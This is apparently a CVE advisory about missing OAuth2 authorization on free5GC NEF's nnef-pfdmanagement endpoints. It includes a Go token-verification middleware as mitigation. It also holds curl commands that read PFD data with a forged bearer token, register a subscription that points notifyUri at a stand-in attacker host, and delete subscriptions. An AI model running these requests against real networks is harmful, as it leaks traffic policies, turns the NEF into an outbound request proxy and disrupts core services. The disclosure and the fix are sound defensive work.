The vulnerability resides in free5GC's Network Exposure Function (NEF), which mounts the `nnef-pfdmanagement` route group without any inbound OAuth2 or bearer-token authorization middleware. Although the NEF advertises the setting `receive from NRF: true` (meaning it claims to validate tokens issued by the NRF), the route group is mounted with no authentication check at all. An attacker who can reach the NEF on the Service Based Interface (SBI) can supply a forged or completely arbitrary bearer token (e.g. `Authorization: Bearer not-a-real-token`) and still have the request processed.

The affected endpoints are `GET /applications` and `GET /applications/{appID}`, which return Packet Flow Description (PFD) application data, and `POST /subscriptions` and `DELETE /subscriptions/{subID}`, which create and delete PFD change-notification subscriptions. In the source, the route group is mounted without auth middleware at NFs/nef/internal/sbi/server.go:56, and the read and subscription handlers query the UDR (Unified Data Repository) directly without verifying the token. The `POST /subscriptions` handler only checks that `notifyUri` is present before storing the subscription, and `DELETE` removes the subscription unconditionally. The NEF context implements outbound token acquisition (GetTokenCtx) for calls it makes to other NFs, but has no inbound authorization path for calls it receives.

The issue was validated against the official Docker compose lab using the NEF container `free5gc/nef:v4.2.0` and source tag v4.2.1. The same root cause underlies other NEF SBI findings, but unlike the OAM and traffic-influence groups, `nnef-pfdmanagement` is declared in the runtime ServiceList, making it the production-intended path that operators expect to be secured.
DailyCVE form:
Platform: free5GC NEF SBI
Version: v4.2.1
Vulnerability: Missing auth middleware
Severity: Critical
Date: 2026-03-11
Prediction: Patch 2026-03-15
What Undercode Say:
Check NEF route group mount without auth (source code)
grep -n "nnef-pfdmanagement" NFs/nef/internal/sbi/server.go
Expected output: line 56 showing group without auth middleware
Simulate forged token read of all PFD applications
curl -i -H 'Authorization: Bearer not-a-real-token' \
'http://<NEF-IP>:8000/nnef-pfdmanagement/v1/applications'
Create malicious subscription with attacker-controlled notifyUri
curl -i -X POST \
-H 'Authorization: Bearer fake' \
-H 'Content-Type: application/json' \
--data '{"applicationIds":["victim-app"],"notifyUri":"http://attacker.com/collect"}' \
http://<NEF-IP>:8000/nnef-pfdmanagement/v1/subscriptions
Delete legitimate subscription
curl -i -X DELETE -H 'Authorization: Bearer fake' \
http://<NEF-IP>:8000/nnef-pfdmanagement/v1/subscriptions/1
Exploit:
An attacker on the same network as the NEF SBI (typically port 8000) sends HTTP requests to the vulnerable endpoints with any string in the `Authorization: Bearer` header. No cryptographic validation of the token occurs. The NEF processes the request, queries the UDR, and returns PFD data (URL regex patterns, application IDs) or creates/deletes subscriptions. Because `notifyUri` is stored without validation, the attacker can also point it at an internal service, causing the NEF to send outbound notifications to that address whenever PFDs change.
Protection from this CVE:
Apply the upstream fix from free5gc/nef23, which adds OAuth2 middleware to the `nnef-pfdmanagement` route group. Alternatively, manually wrap the route group with token validation in server.go so that every request is rejected with 401 unless it carries an NRF-issued token that verifies. Deploy network ACLs to restrict SBI access to the trusted NRF and core components only. Monitor NEF logs for requests with invalid or missing bearer tokens reaching the handlers (indicated by `[bash][NEF][bash]` entries without prior auth failures).
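The "wrap the route group with token validation" mitigation, shown as an added example in Go (free5GC's language); this is not free5GC's own code or its fix. It contrasts the vulnerable shape described above (handlers mounted with no inbound check, so `Bearer not-a-real-token` is served) with a mount where the same handlers sit behind a middleware that verifies the token before anything reaches them. Assumptions, not from the page: tokens are compact JWS signed with HS256 under a key the NEF shares with the NRF, the NRF instance name `nrf-demo`, the audience value `NEF`, the stand-in `pfdHandler`, and the constructed sample response; a real deployment must verify against the key material and issuer the NRF actually uses.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
	"time"
)

// tokenClaims is the subset of access-token claims the NEF checks before serving.
type tokenClaims struct {
	Issuer   string `json:"iss"`
	Audience string `json:"aud"`
	Scope    string `json:"scope"`
	Expiry   int64  `json:"exp"`
}

// verifier holds what the NEF knows about the NRF: the HS256 key (assumption for
// this example), the expected issuer, and a clock (injectable for testing).
type verifier struct {
	key    []byte
	issuer string
	now    func() time.Time
}

// parseAndVerify checks header.payload.signature: the HMAC is always recomputed
// over the signing input with the configured key (the "alg" header is ignored, so
// an alg-switch cannot downgrade the check), then iss, aud, scope and exp are tested.
func (v *verifier) parseAndVerify(raw string) (*tokenClaims, error) {
	parts := strings.Split(raw, ".")
	if len(parts) != 3 {
		return nil, fmt.Errorf("malformed token")
	}
	sig, err := base64.RawURLEncoding.DecodeString(parts[2])
	if err != nil {
		return nil, fmt.Errorf("bad signature encoding")
	}
	mac := hmac.New(sha256.New, v.key)
	mac.Write([]byte(parts[0] + "." + parts[1]))
	if !hmac.Equal(sig, mac.Sum(nil)) { // constant-time comparison
		return nil, fmt.Errorf("signature mismatch")
	}
	payload, err := base64.RawURLEncoding.DecodeString(parts[1])
	if err != nil {
		return nil, fmt.Errorf("bad payload encoding")
	}
	var c tokenClaims
	if err := json.Unmarshal(payload, &c); err != nil {
		return nil, fmt.Errorf("bad claims")
	}
	switch {
	case c.Issuer != v.issuer:
		return nil, fmt.Errorf("unexpected issuer")
	case c.Audience != "NEF":
		return nil, fmt.Errorf("token not issued for NEF")
	case !hasScope(c.Scope, "nnef-pfdmanagement"):
		return nil, fmt.Errorf("missing nnef-pfdmanagement scope")
	case c.Expiry == 0 || v.now().Unix() >= c.Expiry:
		return nil, fmt.Errorf("token expired")
	}
	return &c, nil
}

func hasScope(scopes, want string) bool {
	for _, s := range strings.Fields(scopes) {
		if s == want {
			return true
		}
	}
	return false
}

// requireToken is the inbound-authorization middleware the vulnerable route group
// lacks: missing or unverifiable bearer tokens never reach the handlers.
func (v *verifier) requireToken(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		const prefix = "Bearer "
		auth := r.Header.Get("Authorization")
		if !strings.HasPrefix(auth, prefix) {
			w.Header().Set("WWW-Authenticate", `Bearer realm="nef"`)
			http.Error(w, "missing bearer token", http.StatusUnauthorized)
			return
		}
		if _, err := v.parseAndVerify(strings.TrimPrefix(auth, prefix)); err != nil {
			http.Error(w, "invalid token: "+err.Error(), http.StatusUnauthorized)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// pfdHandler stands in for the GET /applications handler (constructed sample body).
func pfdHandler(w http.ResponseWriter, r *http.Request) {
	w.Header().Set("Content-Type", "application/json")
	fmt.Fprint(w, `[{"applicationId":"example-app"}]`)
}

// newNEFMux mounts the nnef-pfdmanagement group. auth=false reproduces the
// vulnerable mount (handlers reachable directly); auth=true wraps the whole group.
func newNEFMux(v *verifier, auth bool) http.Handler {
	group := http.NewServeMux()
	group.HandleFunc("/nnef-pfdmanagement/v1/applications", pfdHandler)
	if !auth {
		return group
	}
	return v.requireToken(group)
}

// mintToken builds an HS256 token the way the (assumed) NRF would.
func mintToken(key []byte, c tokenClaims) string {
	header := base64.RawURLEncoding.EncodeToString([]byte(`{"alg":"HS256","typ":"JWT"}`))
	payload, _ := json.Marshal(c)
	body := header + "." + base64.RawURLEncoding.EncodeToString(payload)
	mac := hmac.New(sha256.New, key)
	mac.Write([]byte(body))
	return body + "." + base64.RawURLEncoding.EncodeToString(mac.Sum(nil))
}

// probe sends GET /applications with the given bearer token ("" = no header)
// and returns the HTTP status.
func probe(h http.Handler, token string) int {
	req := httptest.NewRequest(http.MethodGet, "/nnef-pfdmanagement/v1/applications", nil)
	if token != "" {
		req.Header.Set("Authorization", "Bearer "+token)
	}
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	v := &verifier{key: []byte("demo-nrf-key"), issuer: "nrf-demo", now: time.Now}
	good := mintToken(v.key, tokenClaims{Issuer: "nrf-demo", Audience: "NEF",
		Scope: "nnef-pfdmanagement", Expiry: time.Now().Add(time.Hour).Unix()})
	fmt.Println("vulnerable mount, forged token:", probe(newNEFMux(v, false), "not-a-real-token"))
	fmt.Println("fixed mount, forged token:     ", probe(newNEFMux(v, true), "not-a-real-token"))
	fmt.Println("fixed mount, NRF-signed token: ", probe(newNEFMux(v, true), good))
}
```

The point of `newNEFMux(v, true)` is that the wrap happens once at the group level, so a handler added later to the group cannot be forgotten; with `auth=false` the forged-token request returns 200, exactly the behaviour the advisory describes, while the wrapped mount returns 401 for a missing header, an arbitrary string, a token signed under another key, an expired token, or a token whose scope does not include `nnef-pfdmanagement`.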
Impact:
An unauthenticated remote attacker can read all AF-supplied PFD application data (leaking traffic classification policies), create arbitrary change-notification subscriptions, turning the NEF into an outbound request proxy, and delete legitimate subscriptions, disrupting PFD updates to the SMF/UPF. This breaks the expected OAuth2 security boundary and violates the 3GPP TS 29.522 requirements for the NEF.
Sources:
Reported By: github.com